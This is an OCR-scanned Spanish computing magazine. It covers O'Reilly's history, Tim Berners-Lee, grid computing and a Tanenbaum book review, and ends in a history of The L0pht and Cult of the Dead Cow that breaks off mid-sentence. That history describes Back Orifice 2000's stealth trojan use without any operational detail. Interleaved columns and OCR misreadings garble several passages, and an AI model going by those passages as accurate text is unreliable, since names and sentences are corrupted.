enorme para ellos como libros independientes. 

Las librerías dicen que son la editorial más consistente de libros 
de computación: cada libro nuevo vende, y luego continúa ven- 
diendo. 


=l8/x 


O'Reilly on line 


Primero, un poco de historia. Como muchos vendors utilizaron 
sus libros como documentación, tenían muchos pedidos en los 
“80 para distribuir libros en varios formatos on-line (Sun 
AnswerBook, InfoExplorer de IBM, o LaserkROM de HP). Esto 
era quizás una buena oportunidad de ventas, pero mantener los 
libros en muchos formatos diferentes parecía un negocio sin 
mucho interés. Se dieron cuenta de que si la publicación on line 
realmente tenía éxito, para ellos o para cualquier persona, ne- 
cesitarían desarrollar un formato de intercambio común para los 
libros on line. Los editores podrían entonces permanecer en el 
negocio de proporcionar la información, y dejar a los vendors 
que exhiban el formato común con sus herramientas propieta- 
rias. 

Como resultado, su primer producto on line no era una versión 
electrónica de su serie Window System, sino una versión del 
catálogo de Internet de “The Whole Internet User's Guide «€ 
Catalog”, de Ed Krol. Comenzó como una demo, pero en poco 
tiempo creció hasta convertirse en un producto revolucionario o- 
vacionado por la revista Wired como un evento histórico en la 
era informática. Este producto, el “Global Network Navigator”, o 
GNN, fue el primer portal y el primer sitio web mantenido por 
patrocinadores. Concibieron a GNN como una interfase de in- 
formación hacia Internet, un espacio cuyos artículos, noticias y 
boletines sobre Internet se convirtieron en la entrada a los ser- 
vicios en sí. GNN fue uno de los primeros sitios web, de hecho 
sólo luego de una investigación profunda surgieron los 300 
sitios web de la primera versión del catálogo. 

Hacia finales de 1993, siglos atrás en la línea de tiempo de 
Internet, O'Reilly notó que la gente que estaba entusiasmada 
con GNN no podía conseguirlo fácilmente. Dirían: “Esto es 
genial. ¿Dónde lo consigo?” La respuesta es una larga historia, 
involucrando instrucciones para acceder a Internet, descargar 
software, y finalmente acostumbrarse a la web. Entonces se 
dieron cuenta de que necesitaban una solución de un solo paso. 
Trabajaron en equipo con Spry, una empresa de software con 
base en Seattle, para crear un producto integrado de acceso a 
Internet, “Internet in a Box”. Éste era un software y producto de 
información combinados, incluyendo el software de Spry, GNN, 
y una versión modificada de “The Whole Internet...”, 

En poco tiempo, el catálogo de Internet capturó la atención de 
la editorial. Los proveedores de acceso a 

Internet crecieron como hongos, y se acercaron al juego de los 
servicios on line. Vendieron GNN a America Online, y Spry fue 
vendido a CompuServe. 

Continuaron su incursión en las publicaciones on line, al tiempo 
que la editorial y sus clientes se volvían más hacía el lado de la 
información tecnológica. Después de GNN, crearon 
“WebReview.com”, un sitio enfocado a la tecnología, que le ven- 
dieron a Millar Freeman en 1999. Dale Dougherty, el fundador 
de GNN y WebReview.com enfocó su ingenio hacia “O“Reilly 
Networks”, un portal para desarrolladores que se enfocan en 
tecnologías abiertas y emergentes. Con sitios incluyendo 
“XML.com”, “Perl.com”, y “OpenP2P.com”, O“Reilly Network 
cubría las tecnologías más importantes con la marca registra- 
da O'Reilly, independiente, profunda y basada en la experien- 
cia. 

En abril de 1998, albergaron la primer Cumbre de Código 
Abierto. Este evento juntó a líderes de muchas comunidades de 
código abierto muy importantes, incluyendo Linux, Apache, Tel, 
Python, Perl y Mozilla. La convención generó publicidad nacio- 
nal para el código abierto, llamando la atención del mundo de 
los negocios. Hubo otra cumbre en Marzo de 1999, que se 
enfocó en casos de negocios para código abierto. Las con- »> 
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Historia on] T 


venciones que hicieron han estrechado nuevos lazos entre 
líderes industriales, han hecho conocidas las ediciones sobre 
tecnología y cristalizaron las ediciones críticas sobre tecnologí- 
as emergentes. 

Como parte de una campaña de apoyo a la comunidad de Perl, 
produjeron la primera conferencia sobre “El parche de Internet” 
en 1997. Algunos años más tarde, agregaron conferencias 
sobre varias otras tecnologías de código abierto, y así nació la 
“Convención de Código Abierto”. No importa qué forma tomen 
(libro, conferencia, producto on line) la idea fue que cualquier 
producto con el nombre O“Reilly sea útil, interesante y confia- 
ble. 

A finales del 2000 en Alemania se origina el término de 
Soluciones LAMP para describir a las aplicaciones web creadas 
utilizando la siguiente combinación de herramientas: Linux, el 
sistema operativo; Apache, el servidor web; MySQL, el servidor 
de bases de datos; Perl, PHP, y/o Python, lenguajes de progra- 
mación. 

Ampliamente promocionado por la editorial O'Reilly, la influen- 
cia de la editorial O'Reilly en el mundo del software libre hizo 
que el término se popularizara rápidamente en todo el Mundo. 


Más información: 

http://www. oreilly.com 

Curiosee el CV de Tim O'Reilly en: 
http://www. oreilly.com/oreilly/tim_bio.html 


Tim Berners-Lee, padre de Internet 


“World Wide Web: Una telaraña tan grande 
como todo el mundo” 


Sir Timothy 
(Tim) John Berners- 
Lee, nacido en 1955 
en el Reino Unido, se 
licenció en Física en 
1976 en la Universidad 
de Oxford. Su inven- 
ción, la World Wide 
Web (WWW), no es lo 
mismo que Internet. 

En la década 
del 70, el gobierno de 
Estados Unidos pre- 
sentó a Rand Corp. un 
problema estratégico: 
¿Cómo podrían las autoridades comunicarse con éxito después 
de una posible guerra nuclear? Rand propuso una red de co- 
municación sin autoridad central, diseñada para funcionar 
incluso con bajísimos recursos. El Pentágono decidió financiar 
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la red, llamada ARPANET, que durante los 70s, hizo crecer su 
estructura descentralizada logrando una fácil extensión. 
Mientras avanzaban los 70s y 80s, muchos grupos unieron sus 
computadoras a la red de redes, que vino a ser conocida como 
Internet. ARPANET expiró formalmente en 1989, víctima de su 
propio éxito. 

Trabajando como investigador en el CERN (Centro 
Europeo para la Investigación Nuclear), Berners-Lee concibió la 
idea de un proyecto de hipertexto global que años más tarde se 
convertiría en la WWW. Así nace el protocolo HTTP (Hyper Text 
Transfer Protocol) y el lenguaje HTML (Hyper Text Markup 
Language). Un primer programa fue presentado allí a finales de 
1990 y en 1992, empezaron las primeras presentaciones públi- 
cas. Como el programa era puesto a disposición desde el 
CERN, su difusión fue muy rápida; el número de servidores 
Web pasó de veintiséis (en 1992) a doscientos (en 1995). En 
1994 Berners-Lee se trasladó a EE.UU. y puso en marcha el 
W3C (World Wide Web Consortium - Consorcio de la Web), que 
dirige actualmente. 


¿Cuál fue el invento en sí? 


Antes de 1990, navegar en Internet no era tan simple 
como sólo pulsar un enlace; más bien se parecía a un archipié- 
lago de miles de islas inconexas. No existían los buscadores, 
no se podía integrar imágenes y textos, y pretender obtener la 
información que nos interesaba era como encontrar una aguja 
en un pajar. Fue entonces cuando Berners-Lee entró en 
escena, combinó dos tecnologías ya existentes (el hipertexto y 
el protocolo de comunicaciones de Internet), creando un nuevo 
modelo de acceso a la información más intuitivo. Habitualmente 
se comunicaba con sus colegas de otros centros de investiga- 
ción, enviándoles artículos citando otros artículos, que hacían 
referencia a otros más... Para facilitar esa labor diseñó la 
primera versión del HTML, un lenguaje para marcar textos que 
permitía incluir enlaces. Escribió el primer servidor, “HTTPD”, y 
el primer cliente, “WWW” un browser/editor WYSIWYG (What 
You See Is What You Get = Lo que ve es lo que obtiene) que 
corría en un entorno NeXTStep. 

Entonces, el hipertexto sólo era usado para marcar do- 
cumentos dentro de una misma PC, pero no era posible crear 
enlaces con documentos guardados en máquinas externas. 
Berners-Lee creó el Identificador Universal de Documentos 
(UDI), que posteriormente se convirtió en la conocida URL 
(Uniform Resource Locutor), usada para crear enlaces con do- 
cumentos situados en redes de servidores. En 1991, su progra- 
ma se empezó a distribuir gratuitamente en el mundo académi- 
co y el número de usuarios creció rápidamente. En 1994 lo 
usaban ya 50 millones de personas en todo el mundo. 

Actualmente, Berners-Lee está al frente del W3C, un 
organismo que actúa no sólo como depositario de información 
sobre la red sino también como protector, al defender su carác- 
ter abierto frente a empresas que tratan de introducir software 
con derechos de propiedad. La organización coordina estánda- 
res y añade nuevas funcionalidades a la Web. Por encima de 
todo, sigue promoviendo su visión de la WWW como una fuerza 
que incentive el cambio social y la creatividad del individuo. 


Fuentes: 
http://www.navegante.com 


http://es.wikipedia.org/wiki/Portada 
http://www.w3.org 
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J2EE-Project Experts 
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» Primeros en mentoring en desarrollo Java-J2EE. incluyendo 
Frameworks Open Source. 


Snoo 


CONSULTING 


» Innovadores en servicios de Análisis Predictivo 
y Visualización de Datos. 


» Unicos en Servicios de Implementación y Administración de 
Servidores Aplicaciones J2EE. 


» Reconocidos por la utilización de Procesos y Mejores 
Prácticas en Gestión de Proyectos y Desarrollos J2EE. 


» Líderes en implementaciones Oracle RAC sobre Linux. 


» Especialistas en Web Services y Arquitecturas 
Orientadas a Servicios. 


» Expertos en Proyectos de Desarrollo J2EE. 


» Comprometidos con la mejor solución costo-beneficio 
para el cliente. 


www.snoopconsulting.com 
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Grid Computing, adelantando el mañana 


Por David Alejandro Yanover 


Fundador y Director de la revista digital de informática MasterMagazine 


www.mastermagazine.info 


Estamos ante una revolucionaria y joven tecnología, que tendrá 
un impacto en comunicación, productividad, costo y beneficio; 
de hecho hoy pueden observarse estas ventajas en decenas de 
instituciones públicas y privadas de los Estados Unidos y 
Europa, donde este fenómeno es una realidad en crecimiento. 
Han pasado cuarenta años, desde la aparición del primer multi- 
procesador hasta llegar a la Grid Computing de estos días. Es 
una revolución que ha avanzado y ayudado a la consolidación 
y superación de numerosas infraestructuras IT, aprovechando 
al máximo los recursos informáticos. Es así, que gracias al Grid 
Computing, se obtiene el mismo rendimiento de una supercom- 
putadora, pero con hardware mucho más económico. 


Las razones que motivan a la implementación de esta tecnolo- 
gía están dadas por la competencia del mercado, un mayor flujo 
de la información, respuestas más rápidas a consultas, y un 
ahorro general de tiempo y esfuerzo. Pensar que una PC pasa 
90% de su tiempo sin hacer nada, mientras otra es exigida con- 
tinuamente, aceptando el ingreso de datos y gestionando apli- 
caciones, es un caso que jamás puede darse en el mundo del 
Grid, porque allí se trabaja en equipo. 


Pero antes de viajar al principio de esta historia, a los orígenes 
de la Grid Computing, así como también de ver en qué se dife- 
rencia de otros modelos similares de comunicación de datos, ya 
desarrollados a nivel mundial, es clave responder ¿en qué con- 
siste esta tecnología? Grid Computing comprende numerosos 
equipos informáticos que trabajan juntos, que comparten los re- 
cursos disponibles pero que a la vez son independientes entre 
sí. Por lo tanto, el poder obtenido a partir de la unificación de 
una serie computadoras, sin importar la distancia física en la 
que estas se encuentren, logra superar a las más avanzadas 
máquinas, que por si solas son derrotadas por estos colosales 
grupos, que se relacionan dinámicamente con el fin de respon- 
der con soltura a las complejas consultas que reciben. De este 
modo, las peticiones se rompen en pequeñas piezas para re- 
partir las tareas correspondientes entre los equipos que confor- 
man el Grid. Mientras tanto, el usuario final ve los datos desde 
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un solo sistema de cómputo. Todo esto hace recordar a la vieja 
frase “la unión hace la fuerza”, y es precisamente aquí donde 
está el corazón del Grid Computing, en la comunicación. 


A continuación, se analiza el surgimiento de esta innovadora 
tecnología, se la compara y se la observa a partir de casos 
reales. Así, nos sumergimos en esta inagotable fuente de recur- 
sos, que hace posible la distribución de la memoria y ciclos del 
CPU de las unidades que lo constituyen. La instalación y admi- 
nistración son aspectos sencillos, y la eficiencia es hasta un 
50% superior a la de servidores individuales, con lo cual se evi- 
dencia también que se trata de una solución más económica, y 
que a mediano plazo retorna la inversión mejorando significati- 
vamente la calidad de la infraestructura IT. 


Toda historia tiene un comienzo. Caminando 
hacia el futuro 


Los primeros pasos hacia el Grid Computing de hoy se dieron 
en un entorno educativo de Estados Unidos, con el fin de 
ampliar las posibilidades de comunicación del conocimiento. lan 
Foster, investigador de IBM, profesor de la Ciencia de la 
Computación en la Universidad de Chicago y en frente del 
Laboratorio de Distribución de Sistemas de Argonne, daba 
forma a la idea en compañía de Steven Tuecke y Carl 
Kesselman, creando así el Globus Project en 1996. En este 
sentido, el emprendimiento obtuvo fondos de entidades del go- 
bierno norteamericano, lo cual hizo posible una pronta adopción 
del Grid en ciertos sectores públicos. 


Más tarde se sumarían organizaciones del gobierno europeo a 
la apuesta, además de referentes de la industria informática, 
como Microsoft e IBM. Éste último se convirtió en el principal 
aliado del Globus Project. De esta manera, con IBM se presen- 
tó un paquete de software libre destinado a la construcción y a 
la expansión de nuevas Grids, Asimismo, IBM fue uno de los 
fundadores del Global Grid Forum, un espacio de encuentro 
para el desarrollo de estándares y herramientas para la emer- 
gente tecnología. 


Clusters y Grids ¿hermanos, primos o descono- 
cidos? 


Evidentemente el modelo que más se acerca al de Grid es el 
Cluster, sin embargo, y aunque existen varias similitudes entre 
ambos, son soluciones muy distintas. 


El primero de los aspectos que se debe remarcar es que mien- 
tras el Cluster opera con miembros de similar configuración 
bajo un sistema de control, el Grid es capaz de soportar equipos 
heterogéneos, sin importar el tipo de dato que se comparte. Por 
lo tanto, el Grid Computing es un campo mucho más flexible. 
Por otro lado, y como se explicaba anteriormente, los miembros 
del Grid trabajan juntos pero no por ello pierden su independen- 
cia, cosa que sí sucede en los Clusters. En ambas opciones, 

la conexión de las computadoras es mediante interconecto- »> 


lex 


res de alta velocidad. También, tanto Clusters como Grids 
gozan de la capacidad de expandirse indefinidamente, aunque 
los segundos sacan mayores ventajas de esta característica. 


El Cluster más consultado del mundo nos lleva al detrás de 
escena del motor de búsqueda Google. Más de 15 mil compu- 
tadoras corren bajo software libre con esta propuesta para 
poder dar respuesta a la demanda que se les presenta día a 
día, según queda reflejado en el documento IEEE Computer 
Society publicado en 2003. Es un verdadero monstruo. Pero el 
truco de Google es que su Cluster lleva la marca Beowulf, lo 
que significa un rendimiento escalable basado en típicas PC's. 


Marcando la diferencia 


Hacer a un lado los Clusters ha servido para comprender un 
poco más acerca del Grid, pero lo que separa al Grid 
Computing de cualquier otra tecnología es la capacidad admi- 
nistrativa de recursos que reúne. El usuario final accede a un 
sistema virtual local en el que tiene a su disposición a todas las 
unidades del Grid, pero lo que destaca es el hecho de que las 
mismas no forman un único dispositivo informático, sino que 
son capaces de actuar por si solos. Esto da lugar a una gran 
cadena de aprovechamiento de recursos IT, que beneficia a en- 
tornos de alta demanda, ofreciéndoles herramientas más 
rápidas, estables y seguras. 


Open Grid Service Architecture (OGSA) define la arquitectura 
del Grid Computing desde una perspectiva que pone en primer 
lugar, como ambiente de desarrollo, a la Web. Expuesto desde 
el Foro Global del Grid, se introducen complejos modelos de 
trabajo, y así se da cita a paquetes de softwa- 


Pero ¿qué se necesita para establecer un Grid? Uno creería 
que se trata de hardware costoso y difícil de conseguir y man- 
tener, dado que la capacidad de esta tecnología logra el mismo, 
e incluso mejor desempeño que el visto en supercomputadoras. 
El trabajo en equipo de las máquinas informáticas que partici- 
pan del Grid comprende desde servidores hasta PC's de escri- 
torio. 


Casos reales 


Numerosas empresas e instituciones públicas de Estados 
Unidos y Europa ya están trabajando en Grid Computing con 
éxito. Resulta interesante ver algunos de estos casos para a- 
preciar con claridad los beneficios de esta tecnología en diver- 
sos contextos. 


- IBM: Responsable de grandes avances en Grid Computing, 
aplica esta tecnología desde hace tiempo para mejorar el trato 
con sus clientes y para sacar nuevos productos al mercado con 
más velocidad y control. Para enfrentarse a la competencia, 
IBM logró marcar nuevos parámetros de productividad gracias 
a la creación de un Grid sustentado por más de siete mil servi- 
dores y el Globus Toolkit. 


- AXYZ Animation: Esta empresa de Toronto dedicada a la a- 
nimación digital y postproducción de video se benefició del Grid 
Computing acelerando sorprendentemente los tiempos de de- 
sarrollo. Según hace trascender la empresa, los trabajos de 
renderización que antes parecían interminables ahora se llevan 
a cabo cómodamente, incluso mientras se realizan otras activi- 
dades. Con una decena de procesadores Dual de AMD e Intel, 

basados en su mayoría en Linux, y trabajan- 


re para la construcción de Grids bien defini- Pensar que una PC pasa 90% de do con el paquete de Grid de Sun, AXYZ no 


dos. su tiempo sin hacer nada, mien- 
Globus Toolkit es una oferta de código abierto tras otra es exigida continuamen- 


sólo consiguió ahorrar tiempo, sino que 
también ganó calidad y precisión. 


que ya mencionamos anteriormente. La te, aceptando el ingreso de datos - Butterfly.net: Un sitio pensado para juegos 
primera versión aparecía allá por 1998, y hoy y gestionando aplicaciones, es un online multijugador, en el que jóvenes 
se está esperando por la edición 4.0. Descrito caso que jamás puede darse en el pueden enfrentarse virtualmente eligiendo 
por numerosos medios como el “estándar de mundo del Grid, porque allí se alguno de los títulos del catálogo de la 


facto”, según el New York Times, mientras 
que para la revista R8£D se trata de “la nueva 
tecnología más prometedora”, y para el MIT Technology 
Review, ésta es “una de las diez innovaciones que cambiarán el 
mundo”. Inclusive, en ciertos contextos, el Grid Computing se 
presenta como la cuarta ola, después de las tecnologías 
Mainframe, Personal, Cliente/Servidor e Internet. 
Evidentemente, no se puede dejar de conocer, al menos en tér- 
minos generales, esta solución de vanguardia. 


Sin sacrificar la autonomía local de los equipos, el Globus 
Toolkit, pensado para tareas de investigación, hace posible la 
transferencia de información entre los miembros del Grid 
estando online, de forma segura. El paquete está constituido 
por software de seguridad, herramientas administración de re- 
cursos, monitoreo, utilidades para la gestión de datos y detec- 
ción de fallas. Son introducidos como una serie de componen- 
tes que pueden usarse todos juntos y por separado, para el de- 
sarrollo de aplicaciones corporativas. Sin embargo, esta no es 
la única oferta que existe en el mercado. Entropia DCGrid 5.1, 
por ejemplo, es una reconocida propuesta orientada a los nego- 
cios y que trabaja sólo con Windows; sin embargo no es gratui- 
to. Sun ONE Grid Engine es otra opción comercial vinculada al 
uso corporativo, con una serie de herramientas específicamen- 
te diseñadas para optimizar los tiempos y las herramientas IT. 


trabaja en equipo. 


página. Estableciendo una arquitectura de 

Grid basada en tecnologías estándar y soft- 
ware libre, la empresa, además de subir drásticamente las ga- 
nancias, destaca que cuando un servidor se cae durante una 
partida, el juego continúa siendo ejecutado por el equipo más 
cercano. Asimismo, el Grid es capaz de soportar hasta un millón 
de jugadores sin comprometer el rendimiento. 


- RBC Insurance: Esta compañía de seguros obtuvo ventajas 
reales en el ahorro de tiempo. Con una solución de Grid, tareas 
que antes demoraban hasta dos horas y media en cumplirse, 
ahora sólo toman minutos. Y un trabajo de dieciocho horas, sólo 
requiere treinta y dos minutos para realizarse; gracias a la ins- 
talación del Grid. Esto ayuda a la empresa a mejorar su aten- 
ción al cliente, además de permitirle ganar puntos frente a los 
rivales del sector. 


Las que se acaban de describir son sólo algunas de las cientos 
de experiencias que están desarrollándose en el mundo. Otras, 
describen cómo el Grid ayuda a la detección y curas de enfer- 
medades enlazando hospitales, o cómo se mejora la investiga- 
ción de proyectos universitarios. El Grid Computing es un fenó- 
meno que está rompiendo los límites tecnológicos, siendo a- 
daptable a distintos ámbitos y proporcionando resultados inme- 
diatos. 


« 
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Este libro es apto para 
cualquier persona con 
conocimientos de informática 
a nivel medio, que quiera ini- 
ciarse o perfeccionar sus 
conocimientos sobre redes, 
ya que la claridad de su 
lenguaje y la cantidad de e- 
jemplos que el autor utiliza lo 
hacen muy comprensible 
para el público en general. 
Este es uno de los libros 
claves que todo aquel que se 
interese por el mundo de las 
redes debería tener en su bi- 
blioteca. 


Descripción del libro 


Los primeros capítulos versan sobre software y hardware de 
redes. Dan una introducción y pueden ser de gran utilidad ya 
que explican de una manera bastante amena todo lo que es una 
red y cómo se estructura. Aporta buenos ejemplos y esquemas 
gráficos muy completos. 

Los siguientes capítulos se refieren a las distintas capas que 
tiene una red, tratando cada una de ellas por separado de una 
manera impecable. Todo lo que puede buscar en estos temas, 
lo encontrará perfectamente aclarado. Se trata de un libro de 
consulta muy recomendable, e incluso de estudio para los que 
les interese el tema. 

Los últimos capítulos tratan de seguridad de redes. El último 
capítulo cita bibliografía adicional para quien quiera buscar 
temas específicos o pretenda profundizar. 


Andrew S. Tanenbaum, autor, profesor, investigador y galardo- 
nado con el premio Karl V. Karlstrom del ACM, para profesores 
sobresalientes, explica con lujo de detalles cómo funciona la 
red internamente, desde el hardware subyacente de la capa 


Otros libros del autor 
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física hasta la capa de aplicación de nivel superior. Tanenbaum 
abarca todo esto y más: 

-La capa física (por ejemplo, cobre, fibra, tecnología inalámbri- 
ca, satélites e Internet por cable). 

La capa de enlace de datos (por ejemplo, principios y verifi- 
cación de protocolos, HDLC y PPP). 

-La subcapa MAC (por ejemplo, Gigabit Ethernet, 802.11, sis- 
temas inalámbricos de banda ancha y con mutación). 

-La capa de transporte (por ejemplo, programación de sockets, 
UDP, TCP, RTP y desempeño de la red). 

-La capa de aplicación (por ejemplo, correo electrónico, 

Web, PHP, Web inalámbrica, MP3 y audio de flujo con 

tinuo). 

-La seguridad en la red (por ejemplo, AES, RSA, criptografía 
cuántica, IPsec y seguridad en Web). 


¿Quién es Andrew S. Tanenbaum? 


Andrew S. Tanenbaum (1944) es el director del Departamento 
de Sistemas de la Universidad de Vrije, Amsterdam (Países 
Bajos). Es profesor de Arquitectura de computadoras y sis- 
temas operativos. Se licenció en el MIT (Massachusetts 
Institute of Technology  -Instituto Tecnológico de 
Massachusetts), doctorándose en la Universidad de Berkeley. 

Escribió Minix, una réplica de UNIX gratuita, que fue la ins 
piración de Linux. También es el autor 
del sistema operativo distribuido 
Amoeba. En 1992 participó en Usenet 
en un encendido debate con Linus 
Torvalds, el creador de Linux, sobre los 
méritos de la idea de Torvalds de utilizar 
un núcleo monolítico en vez de los 
diseños basados en un micronúcleo que 
Tanenbaum creía serían la base de los 
sistemas operativos futuros. Para los 
que quieren dedicarle unos momentos a 
informarse sobre este debate, en la 
página de Tanenbaum encontrarán una especie de "solicitada" 
donde el autor cuenta su más que interesante versión sobre la 
historia de Unix y sus numerosos "derivados". Puede encontrar- 
la en http://www.cs.vu.nl/-ast/brown/ 4 


SISTEMAS OPERATIVOS 
MODERNOS 


SISTEMAS OPERATIVOS 
DISTRIBUIDOS 


Aanira 
Operatin 


1. Fundamentos de seguridad informática 

cDc (Cult of the dead cow), The LOpht y Netcat 
Elementos de criptografía || 
Esteganografía 
Sistemas de autenticación biométricos ip 
Pass phrases vs Passwords a 
Privacidad y seguridad en la web ( 
Usando |Psec para la protección de las redes char beepst5]="1a"; 
PPTP y L2TP sinciude ÓN 
Introducción a las VPN LAO cd 
Quién es quién en el mundo de las VPN bajo Linux 
Delitos informáticos 

char beeps[5]="a"; 


Análisis forense Hnclude ¡o 


Indice 


Usage: cpc [option] [paramet 
where option can be: 
/h , /help get this help 
la , /Hnq don't add (no) quofation 
/q force quotation marks, d$ add them 
fu, /unix change the path separator to UNIX-like separator 
that is: change "M" to "/" 
/d, /ds, /dos change "MN" to "MN" 


v0.2, written by Laszlo Szathmary, szathmlfdelfin.unideb.hu 2 
...s- . 
Edición Especial - Volumen 


2.Ethical hacking Paso a paso 


Paso 6: Hacking NT 2K y Windows 2003 
Paso 7: Hacking Unix 


3.Herramientas 


Netcat: La navaja suiza 
Herramientas de análisis forense 


cDc (Cult of the Dead Cow), 
The LOpht y Netcat 


Durante el verano de 1998 miembros de “The 
LOpht”, una de las organizaciones de hackers 
más interesantes, notorias y productivas fue 
invitado a Washington DC, USA a testificar 
ante el senado de los EE UU. Los miembros 
Space Rogue, Mudge, Brian Oblivion, Dildog, 
Silicosis, Kingpin, tan y Weld Pond habían 
ganado tanta notoriedad que el gobierno a- 
mericano los convocó para escucharlos. 
Quizás una de las características más curio- 
sas de su aparición en el senado fue verlos 
con trajes. Normalmente su atuendo se ase- 
mejaba más a una banda de punks. Fue aquí 
donde manifestaron al senado que podrían (si 
lo deseaban) hacer caer internet en media 
hora. 

Este quizás fue el punto culminante en la trayectoria de “The 
LOpht” y sus miembros. Su prestigio estaba muy alto lo que 
llevó a capitales de riesgo a fusionar a “The LOpht Heavy 
Industries” con el start up de seguridad informática (WStake 
(www.atstake.com). Los miembros de “The LOpht” componen la 
división R£D (investigación y desarrollo) de (VStake. 

La historia no terminó allí. Fueron invitados por el presidente 
Clinton a formar parte del consejo de seguridad en internet. 
Interesante fue como el presidente se dirigió a ellos por sus 
nombres “handle” (nombre con los que actúan como hackers) 
en lugar de sus nombres verdaderos. 

La historia de “The LOpht” y sus miembros está muy ligada a 
otra institución de hackers: cDc (Cult of the Dead Cow). 
Conozcamos la historia de cDc y su relación con “The LOpht” y 
la herramienta de seguridad informática más completa que 
existe: “netcat” (si desea conocer netcat de forma más tecnica, 
lea el artículo en esta edición en la sección “herramientas”). 


El Culto de la Vaca Muerta 


El Culto de la Vaca Muerta (Cult of the Dead Cow - cDc) [1] es 
una organización hacker de alto-perfil fundada en 1984 en 
Lubbock, Texas. Esta organización es muy famosa por su lan- 
zamiento del Back Orifice, en 1998 y Back Orifice 2000, en 
1999. Durante los años 80, la cDc se hizo conocida a través de 
los BBSs por sus newsletters, que continúan produciendo hoy 
en día. 

En diciembre de 1990, el miembro Drunkfux (dFx) creó la 
primera convención moderna de hackers: HoHoCon, realizada 
generalmente en Houston, Texas, que fue la primera conven- 
ción de hackers que invitó a periodistas y legisladores. En total, 
dFx realizó cinco HoHoCons. 

El 7 de enero de 1999, la cDc se unió con una coalición inter- 
nacional de hackers para denunciar una llamada a la “cyber- 
guerra” contra los gobiernos de China y de Iraq. Más adelante 
ese año la cDc creó “Hacktivismo”, un grupo independiente de- 
dicado a la creación de tecnología anti-censura en pos del cum- 
plimiento de los derechos humanos en Internet. En búsqueda 
de uno de sus objetivos: denominado “Dominación Global por 
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Saturación Mediática” (Global Domination 
Through Media Saturation), a través de los años, 
los miembros de la cDc han concedido entrevistas 
a los periódicos importantes, revistas impresas, 
sitios de noticias en línea, y programas de noticias 
internacionales de televisión. 

En febrero de 2000, la cDc era el tema principal 
de un documental de 11 minutos titulado 
“Disinformation”. 


¿Qué es The L0pht? 


La cDc tiene lazos con “The LOpht” en calidad de 
miembro común. The LOpht, [2] además de ser un 
taller en Boston, es el nombre del grupo de 
hackers que lo hicieron famoso. A ocho años de 
su creación el grupo realizó su “open house”, una fiesta de muy 
difícil acceso. Brian Oblivion, uno de los fundadores de The 
LOpht, comenzó a armar esta fiesta con una lista de canciones 
que organizó en su laptop. Debe haber sido una de las pocas 
veces en que se vio a un DJ trabajar sobre una pila de libros de 
computación (Criptografía Aplicada, El Hackeo Expuesto, 
Seguridad de Redes bajo NT, etc.). La noche fue dedicada a re- 
juntar viejos amigos y a cerrar un capítulo en la evolución de 
The LOpht. 

Aunque se conocen 4 fundadores iniciales (Brian Oblivion, 
Count Zero (Zero), Golgo 13 (Golgo) y White Knight (WK)), 
había un quinto integrante: Sin esta gran personalidad The 
LOpht nunca habría sido lo que fue. Y ese gran talento, ese ele- 
mento estelar del underground de Boston es la esposa de Brian 
Oblivion. 

La señora Oblivion es fabricante de sombreros. Cuando su 
negocio comenzó a ampliarse más allá de las limitaciones de su 
hogar ella encontró un loft para dirigir su negocio. Y mientras se 
establecía allí, decidió mudar la “creciente colección de hardwa- 
re” de Brian (por no decir la “pila de placas y gabinetes que 
cualquier esposa descartaría gustosa de su casa”) de su depar- 
tamento al loft. Otros tres compartieron el mismo destino. Zero, 
Golgo y WK tenían más cosas de las que el espacio en sus 
casas les permitía. De a poco The LOpht fue abandonando el 
caos y se fue armando prolijamente con toda la tecnología de la 
que disponían. Este grupo de gente terminó conformando, sin 
saberlo, el taller hacker más grande del mundo. 


Al mismo tiempo que The LOpht, había otros grupos, como 
Messiah Village y Newhackcity; todos poblados con el mismo 
tipo de hackers: jóvenes, brillantes e interesantes. Había 
hackers con poca educación formal en informática. Algunos 
fueron a la universidad y estudiaron antropología o música. 
Otros nunca hicieron algo más allá de la secundaria. Pero lo 
que todos tenían en común era la capacidad para aislar las a- 
plicaciones de las computadoras que manejan y luego volverlas 
a juntar de maneras más poderosas y personalizadas. 

La formación de quienes fundaron The LOpht se desarrolló en 
los años 80, en la época de los BBSs. Estas conformaron una 
red de conexiones dial up a lo largo de Norteamérica y »> 


Europa. Se comunicaban en g-files (o “textfiles” como los 
llaman ahora) y estos archivos contendrían el código para los 
exploits de telefonía y computación, historias fantásticas, letras 
de canciones, y el más creativo arte ASCII jamás capturado. 


En el epicentro de este movimiento estaba el Culto De La Vaca 
Muerta. Dos de los fundadores originales de The LOpht son 
miembros de la cDc, al igual que dos actuales miembros, 
Mudge y Dildog. Aunque la cDc y The LOpht son dos organiza- 
ciones distintas y separadas, han compartido miembros y se 
han influenciado muchísimo. The LOpht fue lanzado hacia el 
final de la era BBS con el nacimiento de la WWW. Por años 
hosteó el sitio original del Culto De La Vaca Muerta, tanto como 
algunas de las colecciones más extraordinarias de contenido 
sobre hacking, phracking y anarquía en la corta historia de la 
WWW. No había chico en el mundo interesado en hacking que 
no haya entrado alguna vez (sino varias) al sitio Web de The 
LOpht para ingresar a un mundo de aprendizaje que le cambia- 
ría la vida para siempre. 

Todo el tiempo el equipo de The LOpht trabajó en proyectos de 
hacking. La mayoría del trabajo giró alrededor del newsletter de 
seguridad, y con el tiempo comenzaron a montar un arsenal de 
tecnología sobre la que probarían sus invenciones y hazañas. 
The LOpht entonces publicaría sus resultados, generalmente 


como “LOpht Advisories”; detallando los detalles de los códigos 
que, luego de su revisión, ellos consideraban que necesitaban 
una corrección. Estos “Advisories” de hecho han hecho mucho 
por la fama de The LOpht. Los hackers han tendido siempre a la 
apertura y no a la oscuridad. Si se descubren exploits, estos 
son expuestos, así todos pueden conocerlos, y no solo los que 
quieren hacer daño. 


Proyecto BO2K 


Back Oriffice 2000 (conocido como BO2K) es una herramienta 
de administración remota de redes. Puede correrse en modo 
“stealth”, una característica común en las aplicaciones de este 
tipo. Esto significa que un usuario no sabría que su máquina es 
administrada externamente. Además de esto, Dildog, quien pro- 
gramó esta aplicación, lo hizo de forma tal que resultó ser un 
programa muy pequeño; lo suficientemente pequeño como para 
ser enviado como adjunto en un e-mail; como para ser abierto, 
instalado y tenerlo funcionando en un momento; y como para 
pasar inadvertido. 

La cDc lanzó esta aplicación con mucha fanfarria, haciendo una 
gran campaña publicitaria. 

El lanzamiento de BO2K demostró que podrían ofrecer al 
público una aplicación de código abierto, gratuita, mejor que 
cualquier otra en el mercado, y que actuaba como una llamada 
de atención al público. BO2K se puede programar para funcio- 
nar como troyano (un programa que funciona en la máquina de 
los usuarios sin el conocimiento del mismo). Esta aplicación, 
más que cualquier otra iniciativa, creó conciencia pública sobre 
